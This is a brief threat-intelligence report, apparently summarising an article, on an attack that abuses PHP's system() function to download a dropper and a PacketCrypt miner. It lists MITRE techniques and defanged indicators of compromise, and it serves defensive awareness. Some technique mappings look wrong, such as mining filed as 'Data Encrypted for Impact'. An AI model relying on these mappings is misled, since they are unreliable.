Researchers have identified a URL that exploits a server-side vulnerability in PHP scripts, allowing attackers to download and execute malicious executables. The malware, dr0p.exe, subsequently downloads pkt1.exe, which acts as a cryptocurrency miner, targeting vulnerable PHP servers. This incident emphasizes the importance of regular security updates to mitigate such threats. Affected Platform: PHP servers
Keypoints :
- A URL exploits a server-side vulnerability in PHP’s system() function.
- The attack downloads a malicious executable named dr0p.exe from a remote server.
- The malware attempts to download using curl and wget, bypassing SSL verification.
- dr0p.exe downloads pkt1.exe, which is a cryptocurrency miner.
- The attack targets vulnerable PHP servers potentially exploiting CVE-2024-4577.
- Regular security patching and auditing of web servers are critical to prevent such vulnerabilities.
- The malicious IP address 23.27.51.244 is linked to the distribution of the malware.
- The PKTC wallet address associated with the attack has accumulated cryptocurrency.
MITRE Techniques :
- Command-Line Interface (T1059.003) – The malware executes commands via PHP’s system() function.
- Exploitation of Remote Services (T1210) – The attack exploits vulnerabilities in web server configurations.
- Credential Dumping (T1003) – The malware may attempt to gather credentials through compromised PHP servers.
- Data Encrypted for Impact (T1486) – The mining of cryptocurrency impacts server performance.
Indicator of Compromise :
- [IP Address] 23[.]27[.]51[.]244
- [File Hash] e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562
- [File Hash] d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36
- [File Hash] 717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397
- [Wallet Address] pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a
- Check the article for all found IoCs.
Full Research: https://gbhackers.com/php-vulnerability-packetcrypt-mining/